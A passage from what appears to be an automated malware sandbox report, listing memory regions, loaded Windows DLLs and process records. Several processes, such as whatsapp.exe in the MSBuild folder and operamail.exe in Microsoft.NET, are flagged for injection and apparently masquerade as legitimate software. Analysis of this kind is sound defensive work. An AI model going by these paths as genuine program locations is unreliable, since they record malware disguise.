"c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3928 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3929 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3930 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3931 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3932 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3933 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3934 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3935 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3936 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3937 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3938 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3939 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3940 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3941 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3942 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3943 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3944 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3945 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3946 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 217 os_tid = 0x123c Thread: id = 218 os_tid = 0x11d8 Process: id = "48" image_name = "whatsapp.exe" filename = "c:\\program files (x86)\\msbuild\\whatsapp.exe" page_root = "0x608f4000" os_pid = "0x11e4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\MSBuild\\whatsapp.exe\" " cur_dir = "C:\\Program Files (x86)\\MSBuild\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3947 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3948 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3949 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3950 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3951 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3952 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3953 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3954 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3955 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3956 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3957 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3958 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3959 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3960 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3961 start_va = 0x500000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3962 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 3963 start_va = 0x890000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 3964 start_va = 0xa20000 end_va = 0xa23fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 3965 start_va = 0xac0000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 3966 start_va = 0xad0000 end_va = 0xb8bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 3967 start_va = 0xc80000 end_va = 0xc96fff monitored = 0 entry_point = 0xc814a1 region_type = mapped_file name = "whatsapp.exe" filename = "\\Program Files (x86)\\MSBuild\\whatsapp.exe" (normalized: "c:\\program files (x86)\\msbuild\\whatsapp.exe") Region: id = 3968 start_va = 0xca0000 end_va = 0x209ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Region: id = 3969 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3970 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3971 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3972 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3973 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3974 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3975 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3976 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3977 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3978 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3979 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3980 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3981 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3982 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3983 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3984 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3985 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3986 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3987 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3988 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3989 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3990 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3991 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3992 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3993 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3994 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 219 os_tid = 0x1240 Thread: id = 220 os_tid = 0x11e8 Process: id = "49" image_name = "active-charge.exe" filename = "c:\\program files (x86)\\windows sidebar\\active-charge.exe" page_root = "0x211fa000" os_pid = "0x11ec" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows Sidebar\\active-charge.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Sidebar\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3995 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3996 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3997 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3998 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3999 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4000 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4001 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4002 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4003 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4004 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4005 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4006 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4007 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4008 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4009 start_va = 0x4e0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4010 start_va = 0x720000 end_va = 0x8a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 4011 start_va = 0x8b0000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 4012 start_va = 0xa40000 end_va = 0xafbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 4013 start_va = 0xb30000 end_va = 0xb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 4014 start_va = 0xbc0000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 4015 start_va = 0x1030000 end_va = 0x1046fff monitored = 0 entry_point = 0x10314a1 region_type = mapped_file name = "active-charge.exe" filename = "\\Program Files (x86)\\Windows Sidebar\\active-charge.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\active-charge.exe") Region: id = 4016 start_va = 0x1050000 end_va = 0x244ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001050000" filename = "" Region: id = 4017 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4018 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4019 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4020 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4021 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4022 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4023 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4024 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4025 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4026 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4027 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4028 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4029 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4030 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4031 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4032 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4033 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4034 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4035 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4036 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4037 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4038 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4039 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4040 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4041 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4042 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 221 os_tid = 0x1244 Thread: id = 222 os_tid = 0x11f0 Process: id = "50" image_name = "operamail.exe" filename = "c:\\program files (x86)\\microsoft.net\\operamail.exe" page_root = "0xeb5e000" os_pid = "0x115c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Microsoft.NET\\operamail.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft.NET\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3755 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3756 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3757 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3758 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3759 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3760 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3761 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3762 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3763 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3764 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3765 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3766 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3767 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3768 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3769 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 3770 start_va = 0x7d0000 end_va = 0x957fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 3771 start_va = 0x960000 end_va = 0xae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 